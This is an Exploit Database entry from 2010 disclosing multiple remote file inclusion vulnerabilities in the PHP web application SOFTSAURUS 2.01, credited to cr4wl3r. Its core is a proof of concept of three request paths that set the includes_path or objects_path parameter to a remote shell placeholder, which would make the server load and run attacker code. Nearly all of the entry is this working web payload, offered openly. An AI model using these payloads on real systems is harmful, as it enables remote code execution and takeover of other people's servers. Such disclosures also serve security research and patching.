SOFTSAURUS 2.01 - Multiple Remote File Inclusions

EDB-ID:

11807

CVE:

N/A


Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2010-03-18


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

============================================================
SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities
============================================================

[+] SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities
[+] Discovered By: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original : http://inj3ct0r.com/exploits/11347
[+] Download: http://code.google.com/p/softsaurus/downloads/list

[+] PoC: [path]/content/plugins/wallpapers/wallpapers.php?includes_path=[Shell]
         [path]/content/themes/softsaurus_default/pages/subHeader.php?objects_path=[Shell]
         [path]/content/themes/softsaurus_stretched/pages/subHeader.php?objects_path=[Shell]

[+] Greetz: Inj3ct0r Team r0073r, 0x1D, bL4Ck_3n91n3


# Inj3ct0r.com [2010-03-18]